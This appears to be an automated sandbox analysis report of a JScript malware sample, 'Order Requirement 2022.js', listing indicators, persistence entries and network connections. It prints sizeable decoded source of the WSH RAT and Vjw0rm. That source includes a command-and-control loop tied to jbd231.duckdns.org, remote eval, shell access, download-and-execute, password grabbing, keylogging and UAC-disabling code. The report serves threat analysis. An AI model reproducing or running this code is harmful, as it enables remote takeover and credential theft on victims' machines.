Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyG
Source: wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyI
Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyK
Source: wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyL
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyT
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyXFwuXFxyb290XFxjaW12MiIpOw0KdmFy
Source: wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready_
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyady
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyady.
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyadyEM
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyas
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyckdns.org:2022/is-ready
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyd8
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readye
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyed.
Source: wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyh8
Source: wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readym32
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readymFtZS5zcGxpdCgiLiIpWzBdLC
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readys.org:2022/is-ready
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readys.org:2022/is-readypData
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readysL8
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyspecified
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyt
Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:20ecuritycenter2=
Source: wscript.exe, 00000001.00000003.378593227.00000228B31F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com=
Source: wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZZZZ
Source: unknown HTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScriptAccept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: jbd231.duckdns.org:2022Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: javaautorun.duia.ro

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR

System Summary

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: Order Requirement 2022.js Initial sample: Suspicious string keylogger A2V5BG9NZ2VY
Source: Order Requirement 2022.js Initial sample: Suspicious string spreading C3BYZWFKAW5N
Source: Order Requirement 2022.js Initial sample: Suspicious string .write LNDYAXRL
Source: Order Requirement 2022.js Initial sample: Suspicious string %comspec% JWNVBXNWZWML
Source: Order Requirement 2022.js Initial sample: Suspicious string win32_ D2LUMZJF
Source: Order Requirement 2022.js Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Requirement 2022.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\CekIalTska.js
Source: classification engine Classification label: mal100.troj.expl.evad.winJS@20/6@14/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 
/f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.

Boot Survival

Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 2022
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: wscript.exe, 00000001.00000003.378665321.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379252266.00000228B3205000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.892923244.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401665667.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401299378.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000002.869027680.0000026E2AEB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?
Source: wscript.exe, 00000008.00000002.853778146.0000029D8033B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>'
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379481262.00000228B319F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Domain query: jbd231.duckdns.org
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.150.138 2022
Source: C:\Windows\System32\wscript.exe Network Connect: 154.120.126.87 5465
Source: C:\Windows\System32\wscript.exe Domain query: javaautorun.duia.ro
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.144.237 2022
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rpwinmgmts:\\localhost\root\securitycenter3
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: displaynameq
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $volumeserialnumber
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copyfile
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: namespace
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t:p_m
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :eval code// coded by v_b01 | sliemerez -> twitter : sliemerez
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var j = ["wscript.shell","scripting.filesystemobject","shell.application","microsoft.xmlhttp"];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var g = ["hkcu","hklm","hkcu\\vjw0rm","\\software\\microsoft\\windows\\currentversion\\run\\","hklm\\software\\classes\\","reg_sz","\\defaulticon\\"];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var y = ["winmgmts:","win32_logicaldisk","win32_operatingsystem",'antivirusproduct'];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sh = cr(0);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fs = cr(1);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var spl = "|v|";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ch = "\\";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vn = "9/21" + "_" + ob(6);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fu = wscript.scriptfullname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wn = wscript.scriptname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var u;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = sh.regread(g[2]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sv = fu.split("\\");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (":\\" + sv[1] == ":\\" + wn) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "true";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.regwrite(g[2],u,g[5]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } else {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "false";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ns();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var p = pt('vre','');
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p = p.split(spl);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "cl") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit(1);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "sc") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = ex("temp") + "\\" + p[2];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fi = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.write(p[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run(s2);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "ex") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(p[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rn") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ri = fs.opentextfile(fu,1);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fr = ri.readall();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ri.close();
